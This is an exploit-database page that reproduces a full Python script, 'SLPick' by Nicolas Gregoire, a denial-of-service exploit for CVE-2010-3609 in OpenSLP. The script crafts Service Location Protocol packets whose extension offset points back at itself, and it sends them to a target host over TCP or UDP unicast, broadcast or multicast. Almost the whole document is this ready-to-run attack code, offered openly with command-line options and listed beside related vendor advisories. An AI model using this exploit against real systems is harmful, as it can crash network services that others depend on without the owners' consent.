Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

SLP (Service Location Protocol) Denial Of Service

🗓️ 26 Jul 2011 00:00:00Reported by Nicolas GregoireType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 54 Views

SLP DoS code for generating malicious SLP packets in Python with mode options and payload creation function

Related
Code
ReporterTitlePublishedViews
Family
CVE		CVE-2010-3609
11 Mar 201117:00
cve
Cvelist		CVE-2010-3609
11 Mar 201117:00
cvelist
Debian		[SECURITY] [DLA 304-1] openslp-dfsg security update
3 Sep 201507:43
debian
Tenable Nessus		Debian DLA-304-1 : openslp-dfsg security update
4 Sep 201500:00
nessus
Tenable Nessus		Fedora 20 : openslp-1.2.1-22.fc20 (2015-7561)
29 May 201500:00
nessus
Tenable Nessus		GLSA-201707-05 : OpenSLP: Multiple vulnerabilities
10 Jul 201700:00
nessus
Tenable Nessus		Mandriva Linux Security Advisory : openslp (MDVSA-2012:141)
6 Sep 201200:00
nessus
Tenable Nessus		Mandriva Linux Security Advisory : openslp (MDVSA-2013:111)
20 Apr 201300:00
nessus
Tenable Nessus		openSUSE Security Update : openslp (openSUSE-SU-2010:0992-1)
5 May 201100:00
nessus
Tenable Nessus		openSUSE Security Update : openslp (openSUSE-SU-2010:0992-1)
5 May 201100:00
nessus
Rows per page
`#!/usr/bin/python  
  
''' ==================================  
Pseudo documentation   
================================== '''  
  
# SLPick, extension DoS release  
# by Nicolas Gregoire  
  
''' ==================================  
Imports   
================================== '''  
  
import getopt  
import re  
import sys  
import binascii  
import struct  
import socket  
import os  
  
  
''' ==================================  
Default values  
================================== '''  
  
version = '0.4'  
mode = 'unicast'  
source = 'N/A'  
target = 'N/A'  
xid = '\x12\x34'  
port = 427  
nb = 1  
req = 'sr'  
  
''' ==================================  
Standard functions  
================================== '''  
  
# Some nice formatting  
def zprint(str):  
print '[=] ' + str  
  
# Function displaying CLI arguments  
def showUsage():  
print 'Usage : ' + sys.argv[0] + ' [-h] [-m mode] [-p port] [-n number] [-s source_IP] [-t target_IP]'  
print '\t[-h] Help (this text)'  
print '\t[-m] Mode : tcp / unicast / broadcast / multicast (default is "' + mode + '")'  
print '\t[-p] Port : default is "' + str(port) + '"'  
print '\t[-s] Source IP Adress : no default (used only in multicast mode)'  
print '\t[-t] Target IP Adress : no default (forced in multicast mode)'  
print '\t[-n] Number of extensions : 0 (no bug) / 1 (default) / 2 (trailing extension)'  
print '\t[-r] Request type : sr (ServerRequest, default) / ar (AttributeRequest)'  
sys.exit(1)  
  
# Function parsing parameters  
def getArguments():  
try:  
optlist, list = getopt.getopt(sys.argv[1:], 'hm:p:t:s:n:r:')  
except getopt.GetoptError:  
showUsage()  
for opt in optlist:  
if opt[0] == '-h':  
showUsage()  
if opt[0] == '-p':  
global port  
port = opt[1]  
if opt[0] == '-s':  
global source  
source = opt[1]  
if opt[0] == '-t':  
global target  
target = opt[1]  
if opt[0] == '-m':  
global mode  
mode = opt[1]  
if opt[0] == '-n':  
global nb  
nb = int(opt[1])  
if opt[0] == '-r':  
global req  
req = opt[1]  
  
# Function checking parameters  
def checkArguments():  
if (mode == 'multicast'):  
# XID : must be 0 in multicast mode  
# Target IP : default SLP multicast address  
# Source IP : address of the local interface   
global xid  
xid = '\x00\x00'  
zprint('Forcing XID to "0"')  
global target  
target = '239.255.255.253'  
zprint('Forcing target IP to "' + target + '"')  
if (source != 'N/A') :  
zprint('Forcing source IP to "' + source + '"')  
else:  
zprint('You need to force the source address with "-s" !')  
showUsage()  
elif (mode == 'unicast') or (mode == 'broadcast') or (mode == 'multicast') or (mode == 'tcp'):  
# Target IP : must be defined  
if (target == 'N/A') :  
zprint('Invalid target !')  
showUsage()  
else :  
zprint('Invalid mode !')  
showUsage()  
  
''' ==================================  
SLP functions  
================================== '''  
  
# Define payload of type "Service Request"  
def getServRequest():  
  
zprint('Creating payload of type "Service Request"')  
  
# Function type  
f = '\x01'  
# Empty fields  
previous_list_length = '\x00\x00'  
predicate_length = '\x00\x00'  
scope_length = '\x00\x00'  
spi_length = '\x00\x00'  
# Variable-size fields  
service = 'service:directory-agent'  
service_length = struct.pack('!h', len(service))   
# Create message  
m = previous_list_length + service_length + service  
m += predicate_length + scope_length + spi_length  
  
return(f, m)  
  
# Define payload of type "Attribute Request"  
def getAttrRequest():  
  
zprint('Creating payload of type "Attribue Request"')  
  
# Function type  
f = '\x06'  
# Empty fields  
previous_list_length = '\x00\x00'  
tag_length = '\x00\x00'  
spi_length = '\x00\x00'  
# Variable-size fields  
url = 'http://www.agarri.fr/'  
url_length = struct.pack('!h', len(url))   
scope = 'default'  
scope_length = struct.pack('!h', len(scope))   
# Create message  
m = previous_list_length  
m += url_length + url + scope_length + scope  
m += tag_length + spi_length  
  
return(f, m)  
  
# Define the function creating the full SLP packet  
def createPacket(function, message):  
  
zprint('Adding headers and trailers')  
  
# SLP Version  
version = '\x02'  
# Set the 'Multicast required' flag to 1  
if (mode == 'broadcast' or mode == 'multicast'):  
flags = '\x20\x00'  
else:  
flags = '\x00\x00'  
  
#######################################################  
# Here's the bug !!!!  
#######################################################  
zprint('Using ' + str(nb) + ' extension(s)')  
if (nb == 0):  
# No extension == no bug  
next_ext_offset = '\x00\x00\x00'  
extension = ''  
elif (nb == 1):  
# Loop over itself  
next_ext_offset = '\x00\x00\x05'  
extension = ''  
elif (nb == 2) :  
# Point to another extension located at the end of the packet  
# TODO : Calculate it at runtime  
if (req == 'sr'):  
next_ext_offset = '\x00\x00\x31'  
else :  
next_ext_offset = '\x00\x00\x36'  
# OpenSLP : extid should be < 0x4000 or > 0x7FFF   
ext_id = '\xBA\xBE'  
# Loop over itself, 0x05 (back to previous extension) should work too   
ext_nextoffset = next_ext_offset  
# Could be anything  
ext_data = '\x22\x22'  
# Create the trailing extension  
extension = ext_id + ext_nextoffset + ext_data  
else:  
print 'Wrong number of extensions'  
sys.exit(1)  
  
# Variable-size headers  
lang = 'en'  
lang_length = struct.pack('!h', len(lang))   
  
# Assemble headers  
headers = flags + next_ext_offset + xid + lang_length + lang  
  
# Packet = version + function + overall size + headers + message + extension  
packet = version + function + '\x00'  
packet += struct.pack('!h', len(headers + message + extension) + 5)   
packet += headers + message + extension  
  
return packet  
  
''' ==================================  
Send packet via TCP or UDP  
================================== '''  
  
# Send via TCP  
def sendTcpPacket(packet):  
  
zprint('Sending packet via TCP [' + target + ']')  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.settimeout(3)  
try:  
s.connect((target, port))  
except socket.error:  
zprint('Socket error (port closed ?)')  
sys.exit(1)  
s.send(packet)  
s.close  
  
# Send via unicast UDP  
def sendUnicastPacket(packet):  
  
zprint('Sending packet via Unicast UDP [' + target + ']')  
s = socket.socket( socket.AF_INET, socket.SOCK_DGRAM )  
s.sendto( packet, (target, port) )  
  
# Send via broadcast UDP  
def sendBroadcastPacket(packet):  
  
zprint('Sending packet via Broadcast UDP [' + target + ']')  
s = socket.socket( socket.AF_INET, socket.SOCK_DGRAM )  
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)  
s.sendto( packet, (target, port) )  
  
# Send via multicast UDP  
def sendMulticastPacket(packet):  
  
zprint('Sending packet via Multicast UDP [' + target + ']')  
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)  
sock.bind((source, 6666)) # Select an interface (and an evil port ;-)  
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)  
sock.sendto(packet, (target, port) );  
  
''' ==================================  
Main code  
================================== '''  
  
# Print banner  
zprint('SLPick : SLP client v' + version + ' (by Nicolas Gregoire)')  
  
# Set options  
getArguments()  
checkArguments()  
  
# Which payload ?  
if (req == 'ar'):  
func, payload = getAttrRequest()  
else :  
func, payload = getServRequest()  
  
# Add headers and trailers (including extensions)  
packet = createPacket(func, payload)  
  
# TCP  
if (mode == 'tcp'):  
sendTcpPacket(packet)  
# UDP  
elif (mode == 'unicast'):  
sendUnicastPacket(packet)  
elif (mode == 'broadcast'):  
sendBroadcastPacket(packet)  
elif (mode == 'multicast'):  
sendMulticastPacket(packet)  
  
# Exit  
zprint('Exit')  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Jul 2011 00:00Current
7.6High risk
Vulners AI Score7.6
EPSS0.3547
service location protocoldenial of servicepython codepseudo documentationimportsdefault valuesstandard functionsparametersslp functions
54